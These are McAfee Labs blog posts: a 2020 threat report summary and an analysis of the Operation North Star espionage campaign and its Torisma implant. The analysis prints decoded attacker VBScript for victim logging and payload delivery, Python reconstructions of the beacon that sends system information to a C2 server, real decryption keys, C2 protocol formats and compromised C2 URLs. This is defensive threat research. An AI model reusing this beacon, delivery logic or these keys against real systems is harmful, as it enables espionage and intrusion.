
McAfee Labs Report Reveals Continuing Surge of COVID-19 Threats and Malware

By Raj Samani

The McAfee Advanced Threat Research team today published the McAfee Labs Threats Report: November 2020.

In this edition, we follow our preceding McAfee Labs COVID-19 Threats Report with more research and data designed to help you better protect your enterprise’s productivity and viability during challenging times.

What a year so far! The first quarter of 2020 included a rush of malicious actors leveraging COVID-19, and the trend only increased in the second quarter. For example, McAfee’s global network of more than a billion sensors registered a 605% increase in total Q2 COVID-19-themed threat detections. This is one example of the updated pandemic-related threat activity you can track on our McAfee COVID-19 Threats Dashboard.

This edition of our threat report also looks at other notable Q2 2020 malware increases, including:

  • Attacks on cloud services users reached nearly 7.5 million
  • New malware samples grew 11.5%, averaging 419 new threats per minute
  • PowerShell malware surged 117%

To help ensure your data and systems remain secure, we have also made available the MVISION Insights preview dashboard to demonstrate the prevalence of such current campaigns. This dashboard also provides access to the Yara rules, IoCs, and mapping of such campaigns against the MITRE ATT&CK Framework. We update these campaigns on a weekly basis so, in essence, this threat report has an accompanying dashboard with more detail on specific campaigns.

I certainly hope that you see the value not only in the data presented within the threat report but also in the dashboards. Your feedback is important to us.

Stay safe.

 

McAfee Labs Quarterly Threat Report – November 2020

What a year so far! We exited the first quarter of 2020 battling the rush of malicious actors leveraging COVID-19, and in the second quarter there were no signs of these attacks abating.

Download Now

 


Operation North Star: Summary Of Our Latest Analysis

By Christiaan Beek

McAfee’s Advanced Threat Research (ATR) today released research that reveals new details on how Operation North Star evaluated its prospective victims and launched attacks on organizations in Australia, India, Israel and Russia, including defense contractors based in India and Russia.

McAfee’s initial research into Operation North Star revealed a campaign that used social media sites, spearphishing and weaponized documents to target employees working for organizations in the defense sector. This early analysis focused on the adversary’s initial intrusion vectors, the first stages of how an implant was installed, and how it interacted with the Command and Control (C2) server.

By deepening its investigation into the inner workings of North Star’s C2, McAfee ATR can now provide a unique view into not only the technology and tactics the adversary used to stealthily execute his attacks but also the kinds of victims he targeted.

The latest research probed the campaign’s backend infrastructure to gain greater perspective on how the adversary targeted and assessed his victims for continued exploitation, and how he used a previously unknown implant called Torisma to execute this exploitation.

McAfee’s findings ultimately provide a unique view into a persistent cyber espionage campaign targeting high value individuals in possession of high value defense sector intellectual property and other confidential information.

VECTORS & INFRASTRUCTURE

Most analysis of cyber campaigns is typically reliant upon the dissection of malware and the telemetry of cyber defenses that have come into contact with those campaigns. McAfee’s analysis of Operation North Star complemented these elements by dissecting the C2 infrastructure that operated the campaign. In doing so, we gained a holistic view of its operations that is rarely available to threat researchers.

Attackers often send out many spearphishing emails to many potential targets rather than precisely targeting the highest value individuals. Once the victim opens a message and infects himself, the malware will try to fully exploit his system. But this broad, less precise approach of infecting many is “noisy” in that it is likely to be identified if these infections are happening at scale across an organization (let alone around the world).  Cyber defenses will eventually be able to recognize and stop it.

In the case of Operation North Star, the attackers researched their specific target victims, developed customized content to lure them, engaged them directly via LinkedIn mail conversations, and sent them sophisticated attachments that infected them in a novel way using a template injection tactic.

The campaign used legitimate job recruitment content from popular U.S. defense contractor websites to lure specific victims into opening malicious spear phishing email attachments. Notably, the attackers compromised and used legitimate web domains hosted in the U.S. and Italy to host their command and control capabilities. These otherwise benign domains belonged to organizations in a wide variety of fields, from an apparel manufacturer, to an auction house, to a printing company, to an IT training firm.

Using these domains to conduct C2 operations likely allowed them to bypass some organizations’ security measures because most organizations do not block trusted websites.

The first stage implant was delivered by DOTM files which, once established on a victim’s system, gathered information on that system such as disk and free disk space information, computer name, logged-in username and process information. The C2 would then use a set of logic to evaluate the victim system data sent back by this initial implant to determine whether to install a second-stage implant called Torisma. All the while, it operated to achieve its objectives while minimizing the risk of detection and discovery.

General process flow and component relationship

Torisma is a previously undiscovered, custom-developed, second-stage implant focused on specialized monitoring of high value victims’ systems. Once installed, it would execute custom shellcode and run a custom set of actions depending on the victim systems’ profiles. The actions included active monitoring of the systems and execution of payloads based on observed events. For instance, it would monitor for an increase in the number of logical drives and Remote Desktop Sessions (RDS).

What is clear is that the campaign’s objective was to establish a long-term, persistent espionage campaign focused on specific individuals in possession of strategically valuable technology from key countries around the world.

VICTIMS & IMPACT

The spearphishing messages from McAfee’s early analysis of Operation North Star were written in Korean and mentioned topics specific to South Korean politics and diplomacy. But our latest analysis of North Star’s C2 log files enabled us to identify targets beyond South Korea:

 

  • Two IP addresses in two Israeli ISP address spaces
  • IP addresses in Australian ISP space
  • IP address in Russian ISP address space
  • India-based defense contractor
  • Russian defense contractor

The campaign’s technologies and tactics (the installation of data gathering and system monitoring implants) suggest that the adversary is in a position to remain persistent, conduct surveillance on, and exfiltrate sensitive data from its defense sector victims.

The detailed job descriptions used to lure victims and the selective use of the Torisma implant suggest that the attackers were pursuing very specific intellectual property and other confidential information from very specific defense technology providers. Less valuable victims were sidelined, to be monitored silently over an extended period of time until they became more valuable.

VILLAINS & IMPLICATIONS

McAfee cannot independently attribute Operation North Star to a particular hacking group. McAfee has established that the code used in the spearphishing attachments is almost identical to that used by a 2019 Hidden Cobra campaign targeting Indian defense and aerospace companies. This could indicate that either Hidden Cobra is behind Operation North Star or another group is copying the group’s known and established technology and tactics. But sound, accurate attribution requires that technical analysis of such attacks be complemented by information from traditional intelligence sources available only to government agencies.

McAfee’s findings do suggest that the actors behind the campaign were more sophisticated than they initially appeared in our early analysis. They were focused and deliberate in what they meant to achieve and more disciplined and patient in their execution to avoid detection.

Please see our full report entitled “Operation North Star: Behind the Scenes” for a detailed review of ATR’s analysis of the campaign.

Also, please read our McAfee Defender’s blog to learn more about how you can build an adaptable security architecture against the Operation North Star campaign and others like it.

 


Operation North Star: Behind The Scenes

By Christiaan Beek

Executive Summary

It is rare to be provided an inside view on how major cyber espionage campaigns are conducted within the digital realm. The only transparency afforded is a limited view of victims, a malware sample, and perhaps the IP addresses of historical command and control (C2) infrastructure.

The Operation North Star campaign we detailed earlier this year provided just this. This campaign used social media sites, spearphishing and weaponized documents to target employees working for organizations in the defense sector. This early analysis focused on the adversary’s initial intrusion vectors, described the first stages of how an implant was installed, and how it interacted with the Command and Control (C2) server.

However, that initial disclosure left gaps, such as the existence of a secondary payload, and additional insights into how the threat actors carried out their operations and whom they targeted. The updated report takes a deep dive into the backend infrastructure run by the adversaries, following our identification of previously undiscovered information about it.

These findings reveal a previously undiscovered secondary implant known as Torisma. However, more telling are the operational security measures that were undertaken to remain hidden on compromised systems. In particular, we saw the application of an Allow and Block list of victims to ensure the attacker’s secondary payload did not make its way to organizations that were not targeted. This tells us that the adversary exhibited a degree of technical innovation not only in the use of template injection but also in how the operation was run.

Finally, while we cannot confirm the extent of the success of the adversary’s attacks, our analysis of their C2 log files indicates that they launched attacks on IP addresses belonging to internet service providers (ISPs) in Australia, Israel and Russia, and defense contractors based in Russia and India.

The findings within this report are intended to provide you, the reader, unique insights into the technology and tactics the adversary used to target and compromise systems across the globe.

Compromised Site

Operation North Star C2 infrastructure consisted of compromised domains in Italy and other countries. The compromised domains belonged, for example, to an apparel company, an auction house and a printing company. These URLs hosted malicious DOTM files as well as a malicious ASP page:

  • hxxp://fabianiarte.com:443/uploads/docs/bae_defqa_logo.jpg
  • hxxps://fabianiarte.com/uploads/imgproject/912EC803B2CE49E4A541068D495AB570.jpg
  • https://www.fabianiarte.com/include/action/inc-controller-news.asp

The domain fabianiarte.com (fabianiarte.it) was compromised to host backend server code and malicious DOTM files. This domain hosted DOTM files that were used to mimic defense contractors’ job profiles as observed in Operation North Star, but the domain also included some rudimentary backend server code that we suspect was used by the implant. Log files and copies pertaining to the intrusion of this domain appeared in the wild and provided further insight. According to our analysis of this cache of data, this site was compromised to host code on 7/9/2020.

Two DOTM files were discovered in this cache of logs and other intrusion data. These DOTM files belong to campaigns 510 and 511 based on the hard-coded value in the malicious VB scripts.

  • 22it-34165.jpg
  • 21it-23792.jpg

Developments in Anti-Analysis Techniques

During our analysis we uncovered two DOTM files as part of the cache of data pertaining to the backend. In analyzing first stage implants associated with the C2 server over a period of seven months, we found that there were further attempts by the adversary to obfuscate and confuse analysts.

These DOTM files, which appeared in July, contained first stage implants embedded in the same location as we documented in our initial research. Previous implants from other malicious DOTM files were double Base64 encoded, and the implants themselves were not further obfuscated. The new samples, however, showed some notable changes from those detailed in our initial research:

  • The first stage implant nested in the DOTM file uses triple Base64 encoding in the Visual Basic macro (see the decoding sketch below)
  • The extracted DLL (desktop.dat) is packed with the Themida packer in an attempt to make analysis more difficult
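To illustrate the first point, the following minimal Python sketch shows how a triple Base64 layer can be peeled off. The function name and payload variable are ours; only the fixed count of three decoding passes comes from the analysis above.

import base64

def decode_triple_base64(blob: bytes) -> bytes:
    # The macro applies Base64 three times, so we decode three times
    data = blob
    for _ in range(3):
        data = base64.b64decode(data)
    return data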

The first stage implant extracted from the DOTM files contains an encrypted configuration file and an intermediate dropper DLL. The configuration file, once decrypted, contains information for the first stage implant. The information includes the URL for the C2 and the decryption keys for the second stage payload called “Torisma”.

Contents of decrypted configuration

The configuration file contains information on how to communicate with the C2, including the parameter options (ned, gl, hl). In this case, we see an unknown fourth parameter known as nl; however, it does not appear to be implemented in the server-side ASP code. It is possible that the adversary may have intended to implement it in the future.

Appearance of nl parameter

In addition, analysis of the backend components for this compromised server enables us to draw a timeline of activity on how long the attacker had access. For example, the DOTM files mentioned above were placed on the compromised C2 server in July 2020. Some of the main malicious components involved in the backend operation were installed on this server in January 2020, indicating that this C2 server had been running for seven months.

Digging into the Heart of Operation North Star – Backend

Inc-Controller-News.ASP

As we covered in our initial Operation North Star research, the overall attack contained a first stage implant delivered by the DOTM files. That research found specific parameters used by the implant and that were sent to the C2 server.

Further analysis of the implant (“wsdts.db” in our case) revealed that it gathers information about the victim’s system, for example:

  • System disk information
  • Free disk space information
  • Computer name and logged-in username
  • Process information

Once this information is gathered, it is communicated to the C2 server using the parameters (ned, gl, hl).

These parameters are interpreted by an obfuscated server-side ASP page; the values sent determine the actions taken against the victim. The server-side ASP page was placed on the compromised server in January 2020.

Additionally, based on this information the adversary is targeting Windows servers running IIS to install C2 components.

The server-side ASP page contains a highly obfuscated VBScript embedded that, once decoded, reveals code designed to interact with the first stage implant. The ASP page is encoded with the VBScript.Encode method resulting in obfuscated VBScript code. The first stage implant interacts with the server-side ASP page through the usage of these finite parameters.

Encoded VBScript

Once the VBScript has been decoded it reveals a rather complex set of functions. These functions lead to installing additional stage implants on the victim’s system. These implants are known as Torisma and Doris, both of which are base64 encoded. They are loaded directly into memory via a binary stream once conditions have been satisfied based on the logic contained within the script.

Decoded VBScript

The ASP server-side script contains code to create a binary stream to which we suspect the Torisma implant is written. We also discovered that the Torisma implant is embedded in the ASP page, and decoding the Base64 blob reveals an AES encrypted payload. This ASP page contains logic that decodes this implant and delivers it to the victim.

function getbinary(sdata)
    ' Convert a Unicode string into a raw binary stream via ADODB.Stream
    const adtypetext = 2
    const adtypebinary = 1
    dim binarystream
    dim aa
    aa = "adodb.stream"
    set binarystream = createobject(aa)
    binarystream.type = adtypetext
    binarystream.charset = "unicode"
    binarystream.open
    binarystream.writetext sdata
    binarystream.position = 0
    binarystream.type = adtypebinary
    binarystream.position = 2    ' skip the 2-byte Unicode BOM
    getbinary = binarystream.read
end function

Depending on the values sent, additional actions are performed on the targeted victim. Further analysis of the server-side script indicates that there is logic that depends on some mechanism for the actor to place a victim’s IP address in an allowed-list file. The second stage implant is not delivered to a victim unless this condition is met first. This alludes to the possibility that the actor is reviewing data on the backend and selecting victims; this is likely performed through another ASP page we discovered (template-letter.asp).

The server-side ASP page contains code to interpret the data sent via the following parameters to execute additional code. The values to these parameters are sent by the first stage implant initially delivered by the DOTM files. These parameters were covered in our initial research, however having access to the C2 backend code reveals additional information about their true purpose.

Parameter | Description
NED       | Campaign code embedded in the DOTM macro
GL        | System information
HL        | Flag indicating OS architecture (32 or 64 bits)

The URL query string is sent to the C2 server in the following format.

http://hostname/inc-controller-news.asp?ned=campaigncode&gl=base64encodeddata&hl=0
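A rough Python reconstruction of this first-stage check-in is sketched below; the function and variable names are ours and the hostname is a placeholder, but the query-string layout follows the format above.

import base64
import urllib.request

def beacon(c2_host: str, campaign_code: str, sysinfo: str, is_64bit: bool) -> bytes:
    # gl carries Base64-encoded system information; hl flags the OS architecture
    gl = base64.b64encode(sysinfo.encode()).decode()
    hl = 1 if is_64bit else 0
    url = ("http://" + c2_host + "/inc-controller-news.asp"
           "?ned=" + campaign_code + "&gl=" + gl + "&hl=" + str(hl))
    with urllib.request.urlopen(url) as resp:
        return resp.read()  # second-stage payload, junk payload, or HTTP 405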

Further, code exists to get the infected victim’s IP address; this information is used to check if the IP address is allowed (get the second stage) or if the IP address has been blocked (prevent second stage). As mentioned previously, the addition of the victim’s IP address into the fake MP3 files is likely performed manually through identification of incoming connections through the stage 1 implant.

function getstripaddress()
    ' Determine the connecting client's IP address, preferring proxy headers
    on error resume next
    dim ip
    ip = request.servervariables("http_client_ip")
    if ip = "" then
        ip = request.servervariables("http_x_forwarded_for")
        if ip = "" then
            ip = request.servervariables("remote_addr")
        end if
    end if
    getstripaddress = ip
end function

The full logic retrieves the IP address of the connecting client machine and writes victim entries to a log file. These log files are stored within the WWW root of the compromised server, based on the variable strlogpath.

From the VBScript code snippet below, we can see that the “gl” parameter carries the victim’s system information and the “hl” parameter the OS architecture (32 or 64 bits):

strinfo = replace(request.form("gl"), " ", "+") : strosbit = replace(request.form("hl"), " ", "+")

Victim Logging

The adversary keeps track of victims through logging functionality that is implemented into the server-side ASP code. Furthermore, as described above, the backend server code has the ability to perform victim logging based on first stage implant connections. This log file is stored in the WWW root directory on the compromised C2 server. The following code snippet will write data to a log file in the format [date, IP Address, User Agent, Campaign Code (NED), System Info (GL), OS Architecture (HL)].

strlog = date() & " " & formatdatetime(now(), 4)
r = writeline(strlogpath, strlog)        ' date and time
r = writeline(strlogpath, stripaddr)     ' victim IP address
r = writeline(strlogpath, strua)         ' user agent
r = writeline(strlogpath, strcondition)  ' campaign code (NED)
r = writeline(strlogpath, strinfo)       ' system info (GL)
r = writeline(strlogpath, strosbit)      ' OS architecture (HL)

The server-side ASP code will check whether the IP address is part of an allow-list or block-list by checking for the presence of the IP in two server-side files masquerading as MP3 files. The IP address is stored in the format of an MD5 hash; the server-side code contains a function to create an MD5 hash. The code looks for these files in the WWW root of the compromised server based on the variable strWorkDir.

The use of an allow-list is a possible indication that it contained the adversary’s list of pre-determined targets.

strWorkDir = "C:\":strLogPath=strWorKdir&"lole3D_48_02_05.mp3":StrWhiteFile=strWorkDir&"wole3D_48_02_05.mp3":strBlAcKFile=strWorkDir&"bole3D_48_02_05.mp3":stripAddr=GeTStrIpAddress():strMD5IpAddr=MD5(strIpAddr):strUA=Request.serveRVariables("HTTP_USER_AGENT")

IP allow-list / blocklist checking

For MD5 hash generation, the system appears to use a non-standard form of hashing for the IP addresses. In most cases, the built-in Microsoft cryptographic service provider would be used to generate an MD5; in this case, however, the actor chose to use a custom method instead.

The IP address is retrieved and hashed using this method.

stripaddr=getstripaddress()

strmd5ipaddr=md5(stripaddr)

The following function (ipok) reads from a file that stores hashed IPs and is used later in a conditional block statement. The code below opens and reads the file; if the victim’s hashed IP address appears on a line of the file, ipok returns 1, otherwise it returns 0.

function ipok(hashfile, stripaddr)
    ' Return 1 if the victim's hashed IP appears in the given list file
    on error resume next
    dim fso, fs, linedata
    set fso = server.createobject("scripting.filesystemobject")
    set fs = fso.opentextfile(hashfile, 1, true)
    ipok = 0
    do until fs.atendofstream
        linedata = lcase(fs.readline)
        if len(linedata) > 0 and instr(stripaddr, linedata) then
            ipok = 1
            exit do
        end if
    loop
    fs.close
    set fs = nothing
end function
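For illustration, here is a rough Python equivalent of this allow/block-list lookup. The standard hashlib MD5 digest below is an assumption for readability; as discussed above, the actual campaign used a custom MD5 routine.

import hashlib

def md5_ip(ip: str) -> str:
    # Illustration only: the real backend used a custom MD5 implementation
    return hashlib.md5(ip.encode()).hexdigest()

def ip_in_list(list_path: str, ip: str) -> bool:
    digest = md5_ip(ip)
    with open(list_path) as f:
        # Mirrors ipok(): a non-empty line contained in the hash means a match
        return any(line.strip() and line.strip().lower() in digest for line in f)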

The following code is the logic to determine if an infected victim should receive the Torisma implant. A series of cases are used to make the decision depending on specific conditions as depicted in the code. Below the cases are explained:

  • If the victim’s IP address is on the allow-list and the OS architecture bit value is “1” (representing 64 bits), the 64-bit version of the Torisma implant is sent to the victim, and the term “case_1_64” is written to the log file behind the victim entry, meaning the 64-bit version of the Torisma implant was sent.
  • The same applies in the second case, but for a 32-bit OS (value 0); the term “case_1_86” is written, meaning the 32-bit version of the Torisma implant was sent.
  • If the IP address of the victim is on the block list, with either 32/64-bit OS architecture, a nonsense payload called “doris_x86” or “doris_x64” is sent to the victim. For example, in our case this was the value for “doris_x86”: DoriS_x86=”ddddddd”
  • If condition “24” is returned from the victim, a log entry with value “case_3” is written, no implant is sent, and an HTTP response status of 405 is returned.
  • If none of the above conditions are met, “case_4” is written to the log file, no implant is sent, and again an HTTP response status of 405 is returned.

An HTTP 405 response code indicates that the request method is known by the server but is not supported by the target resource.

if ipok(strwhitefile, strmd5ipaddr) = 1 and instr(strosbit, "1") > 0 then
    r = writeline(strlogpath, "case_1_64")
    strresdata = strbase64_torisma_x64
elseif ipok(strwhitefile, strmd5ipaddr) = 1 and instr(strosbit, "0") > 0 then
    r = writeline(strlogpath, "case_1_86")
    strresdata = strbase64_torisma_x86
elseif ipok(strblackfile, strmd5ipaddr) = 1 and instr(strosbit, "1") > 0 then
    r = writeline(strlogpath, "case_2_64")
    strresdata = strbase64_doris_x64
elseif ipok(strblackfile, strmd5ipaddr) = 1 and instr(strosbit, "0") > 0 then
    r = writeline(strlogpath, "case_2_86")
    strresdata = strbase64_doris_x86
elseif instr(strcondition, "24") > 0 then
    r = writeline(strlogpath, "case_3")
    response.status = "405"
else
    r = writeline(strlogpath, "case_4")
    response.status = "405"
end if

Logic to deliver 2nd stage implant to victim

Inside the Torisma Implant

One of the primary objectives of Operation North Star, from what we can tell, is to install the Torisma implant on the targeted victim’s system based on a set of logic. The end goal is executing custom shellcode after Torisma infection, thus running custom actions depending on the specific victim profile. As described earlier, Torisma is delivered based on data sent from the victim to the command and control server. This process relies on the first stage implant extracted from the VB macro embedded in the DOTM file.

General process flow and component relationship

Further, Torisma is a previously unknown second-stage implant embedded in the server-side ASP page as a Base64 encoded blob. Both 64- and 32-bit versions are embedded; the OS architecture flag value sent by the victim determines which version is sent. The implant is loaded directly into memory as a result of interaction between the victim and the command and control server. The adversary went to great lengths to obfuscate, encrypt and pack the first and second stage implants involved in this specific case.

Once Torisma is decoded from Base64, the implant is still AES encrypted and compressed. The server-side ASP page does not contain any logic to decrypt the Torisma implant itself; rather, it relies on decryption logic contained within the first stage implant. The decryption key exists in an encrypted configuration file, along with the URL for the command and control server.

This makes recovery of the implant more difficult if the compromised server code were to be recovered by incident responders.

The decryption is performed by the first stage implant using the key stored in the configuration file, a static AES key. Torisma can be decrypted with the key 78b81b8215f40706527ca830c34b23f7.

Further, after decrypting the Torisma binary, we found it is also packed with LZ4 compression, giving it another layer of protection. Once the code is decompressed, we are able to analyze Torisma and its capabilities, giving further insight into Operation North Star and the second-stage implant.
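The unwrapping pipeline can be sketched in Python as follows, assuming the pycryptodome and lz4 packages are installed. The AES mode and IV handling are our assumptions; the report confirms only the AES key and the LZ4 layer.

import lz4.block
from Crypto.Cipher import AES

KEY = bytes.fromhex("78b81b8215f40706527ca830c34b23f7")  # key from the config file

def unwrap_torisma(encrypted: bytes, plain_size: int) -> bytes:
    # Assumed mode/IV: the analysis confirms AES + LZ4, not the exact parameters
    cipher = AES.new(KEY, AES.MODE_CBC, iv=b"\x00" * 16)
    decrypted = cipher.decrypt(encrypted)
    return lz4.block.decompress(decrypted, uncompressed_size=plain_size)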

The variant of the implant we analyzed was created on 7/2/2020; however, given that inc-controller-news.asp was placed on the C2 in early 2020, multiple updates are likely.

Based on the analysis, Torisma is sending and receiving information with the following URLs.

  • hxxps://www.fabianiarte.com/newsletter/arte/view.asp
  • hxxps://www.commodore.com.tr/mobiquo/appExtt/notdefteri/writenote.php
  • hxxp://scimpex.com:443/admin/assets/backup/requisition/requisition.php

Encrypted Configuration File

Torisma also uses encrypted configuration files, just as the first stage implant does, to indicate the URLs it communicates with as command and control servers.

Decrypted configuration file

The configuration file for Torisma is encrypted using the VEST algorithm[1], as is the communication sent over the C2 channel. From our research, this encryption method is not commonly used anywhere; in fact, it was a proposed cipher that did not become a standard implemented in general technologies[2].

Further, the FOUND002.CHK file recovered from the backend is used to update the configuration and contains URLs with a .php extension, indicating that some of the backend may have been written in PHP. It is unclear what role the servers with PHP pages have in the overall attack, though we can confirm, based on strings and functions in Torisma, that there is code designed to send and receive files with the page view.asp. This view.asp page is the Torisma implant backend, as our analysis shows. Later in this analysis we cover more on view.asp; that page contains basic functionality to handle requests and to send and receive data with an infected victim running the Torisma implant.

Main Functionality

According to our analysis, the Torisma code is a custom developed implant focused on specialized monitoring.

The role of Torisma is to monitor for new drives added to the system as well as remote desktop connections. This appears to be a more specialized implant focused on active monitoring on a victim’s system and triggering the execution of payloads based on monitored events. The end objective of Torisma is executing shellcode on the victim’s system and sending the results back to the C2.

The Torisma code begins by running a monitoring loop for information gathering.

Information gathering loop

General Process

It runs the monitoring routine but will first check if monitoring is enabled based on the configuration (disabled by default). The general logic of this process is as follows (a minimal sketch in Python follows below):

  1. If monitoring is disabled, just return
  2. Else call the code that does the monitoring and upon completion temporarily disable monitoring
  3. When run, the monitoring will be executed for a specified amount of time based on a configuration value
  4. Upon return of the monitoring function, the code will proceed to command and control communication
  5. If there is repeated failure in communication, the implant will force monitoring for 1hr and then retry the communication
  6. Repeat forever

Triggering monitoring based on configuration
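The following Python sketch compresses the loop above into pseudo-real code. The monitor and c2_communicate stubs and the failure threshold of three are our assumptions, standing in for the implant's actual routines.

import time

def monitor(duration_s: float) -> None:
    # Stub: watch for new logical drives / RDP sessions (detailed below)
    pass

def c2_communicate() -> bool:
    # Stub: exchange data with the C2; returns True on success
    return True

def main_loop(monitoring_enabled: bool, monitor_duration_s: float) -> None:
    failures = 0
    while True:                                  # 6. repeat forever
        if monitoring_enabled:                   # 1./2. run monitoring, then disable it
            monitor(monitor_duration_s)          # 3. bounded by a configured duration
            monitoring_enabled = False
        if c2_communicate():                     # 4. proceed to C2 communication
            failures = 0
        else:
            failures += 1
            if failures >= 3:                    # 5. repeated failure: force 1h monitoring
                monitor(3600)
                failures = 0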

Monitoring

The monitoring loop will retrieve the address of WTSEnumerateSessionsW and the local MAC address using GetAdaptersInfo.

  1. The code will execute in a loop until either enough time has elapsed (the end time is passed as a parameter) or an event of interest occurs

 

Monitoring loop

  2. It will monitor for an increase in the number of logical drives and Remote Desktop Sessions (RDS). If either occurs, a status code will be set (5: new drive, 6: new RDS session) and the monitoring loop stops.

Drive tracking

a. It uses GetLogicalDrives to get a bitmask of all the drives available on the system, then iterates over each possible drive letter

b. It will also use GetDriveType to make sure the new drive is not a CD-ROM drive

Check drive type

c. It keeps track of the number of drives previously seen and will return 1 if the number has increased (sketched in Python below)
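A Windows-only Python sketch of this drive-counting check, using ctypes against the same APIs; the function names are ours, and DRIVE_CDROM mirrors the Win32 constant.

import ctypes

DRIVE_CDROM = 5  # Win32 constant returned by GetDriveTypeW for optical drives

def count_non_cdrom_drives() -> int:
    kernel32 = ctypes.windll.kernel32
    mask = kernel32.GetLogicalDrives()  # bit 0 = A:, bit 1 = B:, ...
    count = 0
    for i in range(26):
        if mask & (1 << i):
            root = chr(ord("A") + i) + ":\\"
            if kernel32.GetDriveTypeW(root) != DRIVE_CDROM:
                count += 1
    return count

def drive_count_increased(previous: int) -> int:
    # Mirrors the implant: return 1 when a new (non CD-ROM) drive appears
    return 1 if count_non_cdrom_drives() > previous else 0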

RDP Session Tracking

The RDP session tracking function operates the same way as the drive tracking. If the number increases by one, it returns 1. It uses WTSEnumerateSessionsW to get a list of sessions and iterates through them to count active ones.

Get active RDP sessions

Get active RDP sessions, continued

Command and Control Communication

The C2 code is interesting and is a custom implementation. The general process for this protocol is as follows.

  1. Generates a connection ID that will be kept throughout this step, as a hex string of five random bytes for each module (0x63), with the random generator seeded with the output of GetTickCount64

Generate connection ID
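In Python, equivalent ID generation might look like the sketch below; time.monotonic_ns stands in for GetTickCount64 as the seed source, an assumption for portability.

import random
import time

def generate_connection_id() -> str:
    # Seed the PRNG from a tick counter, analogous to GetTickCount64
    random.seed(time.monotonic_ns() // 1_000_000)
    return "".join("%02x" % random.randrange(256) for _ in range(5))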

  2. Next it loads a destination URL
      a. There are three available servers hardcoded in the implant as an encrypted blob
      b. The decryption is done using the VEST-32 encryption algorithm with the hardcoded key ff7172d9c888b7a88a7d77372112d772

Configuration Decryption

c. A random configuration number is picked (mod 6) to select this configuration

d. There are only 3 configurations available, if the configuration number picked is above 3, it will keep incrementing (mod 6) until one is picked. Configuration 0 is more likely to be chosen because of this process.

Code to pick configurations
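The selection bias noted above is easy to see in a small Python sketch: slots 3, 4 and 5 all walk around to configuration 0, which therefore gets picked four times out of six.

import random

NUM_SLOTS = 6    # the implant draws a number mod 6
NUM_CONFIGS = 3  # but only three C2 configurations exist

def pick_configuration() -> int:
    n = random.randrange(NUM_SLOTS)    # 0..5
    while n >= NUM_CONFIGS:
        n = (n + 1) % NUM_SLOTS        # keep incrementing (mod 6) until valid
    return n                           # 3, 4 and 5 all end up at configuration 0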

  3. It will send a POST request, with a “VIEW” action, to the URL it retrieved from the configuration. It builds the request using the following hardcoded format string.

ACTION=VIEW&PAGE=%s&CODE=%s&CACHE=%s&REQUEST=%d

PAGE = drive_count

CODE = RDS_session_count

CACHE = base64(blob)

REQUEST = Rand()

 

blob: size 0x43c

blob[0x000:0x400] = form_url

blob[0x400:0x418] = mac_address

blob[0x418:0x424] = connection_id (random)

blob[0x424:0x434] = “MC0921” (UTF-16LE)

blob[0x434:0x438] = status_code

blob[0x438:0x43c] = 1

a. The process will look for the return of the string “Your request has been accepted. ClientID: {f9102bc8a7d81ef01ba}” to indicate success
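Packing this blob can be sketched in Python as below. The field offsets follow the layout above, while the little-endian integer encoding and zero padding are our assumptions.

import base64
import random
import struct

def build_view_request(form_url: str, mac: bytes, conn_id: bytes,
                       status_code: int, drives: int, rds_sessions: int) -> str:
    blob = bytearray(0x43C)
    blob[0x000:0x400] = form_url.encode("utf-16-le")[:0x400].ljust(0x400, b"\x00")
    blob[0x400:0x418] = mac[:0x18].ljust(0x18, b"\x00")
    blob[0x418:0x424] = conn_id[:0x0C].ljust(0x0C, b"\x00")
    blob[0x424:0x434] = "MC0921".encode("utf-16-le").ljust(0x10, b"\x00")
    blob[0x434:0x438] = struct.pack("<I", status_code)  # assumed little-endian
    blob[0x438:0x43C] = struct.pack("<I", 1)
    cache = base64.b64encode(bytes(blob)).decode()
    return ("ACTION=VIEW&PAGE=%s&CODE=%s&CACHE=%s&REQUEST=%d"
            % (drives, rds_sessions, cache, random.randrange(2**31)))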

  4. If successful, it will retrieve data from the C2 via a POST request; this time it will use the PREVPAGE action

a. It uses the following format string for the POST request

ACTION=PREVPAGE&CODE=C%s&RES=%d

With: CODE = connection_id (from before)

RES = Rand()

b. The reply received from the server is encrypted. To decrypt it, the following process is needed:

i. Replace space with +

ii. Base64 decode the result

iii. Decrypt the data with key “ff7172d9c888b7a88a7d77372112d772”

Server decryption using key

iv. Perform a XOR on the data

Perform XOR on the data
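A Python sketch of steps i through iv is shown below. VEST-32 has no common library implementation, so vest32_decrypt is a placeholder, and the XOR key is an assumption; only the ordering of the steps comes from the analysis.

import base64

def vest32_decrypt(data: bytes, key: bytes) -> bytes:
    # Placeholder: VEST-32 is not available in common crypto libraries
    raise NotImplementedError

def xor_transform(data: bytes, key: int = 0x00) -> bytes:
    # iv. final XOR pass; the actual XOR value is sample-specific
    return bytes(b ^ key for b in data)

def decode_c2_reply(reply: str) -> bytes:
    step1 = reply.replace(" ", "+")      # i. restore '+' characters
    step2 = base64.b64decode(step1)      # ii. Base64 decode
    step3 = vest32_decrypt(step2, b"ff7172d9c888b7a88a7d77372112d772")  # iii.
    return xor_transform(step3)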

  5. The decrypted data is going to be used to execute a shellcode from the server and send data back

a. Data from the server will be split into a payload to execute and the data passed as an argument that is being passed to it
b. Part of the data blob sent from the server is used to update the local configuration used for monitoring

i. The first 8 bytes are fed to an add+XOR loop to generate a transformed version that is compared to hardcoded values

Configuration check

Configuration check continued

ii. If the transformed data matched either of the two hardcoded values, the local configuration is updated

iii. In addition, the duration of the observation (for the Drive/RDS) loop can be updated by the server

iv. If the duration is above 0x7620 (21 days) it will then re-enable the monitoring even if the configuration detailed above had disabled it

v. If the transformed data doesn’t match any of the two hardcoded values, then monitoring will be disabled by the configuration

c. The implant will create a new communication thread and will wait until it is notified to continue. It will then proceed to execute the shellcode and wait for the other thread to terminate.

d. Depending on what occurred (an error, or monitoring being enabled/disabled), the code will return a magic value that decides whether the code needs to run again or return to the monitoring process.

Return to communications loop

  6. The communications thread will create a new named pipe (intended to communicate with the shellcode). It then notifies the other thread once the pipe is ready and proceeds to send data read from the pipe to the server.

a. The pipe name is \\.\pipe\fb4d1181bb09b484d058768598b

Code for named pipe

b. It will read data from the pipe (and flag the processing as completed if it finds “- – – – – – – – -”)

c. It will then send the data read back to the C2 by sending a POST in the following format

ACTION=NEXTPAGE&CODE=S%s&CACHE=%s&RES=%d

CODE=connection_id

CACHE=base64(message)

RES = Rand()

d. Data is encrypted following the same pattern as before: it is first XORed and then encrypted using VEST-32 with the same key as before

e. This will be repeated until the payload thread sends the “- – – – – – – – -” message or the POST fails

Campaign Identification

One way the adversary keeps track of which victims are infected by which version of the first stage implant is by using campaign IDs. These IDs are hardcoded into the VB macro of the template document files that are retrieved by the first stage maldoc.

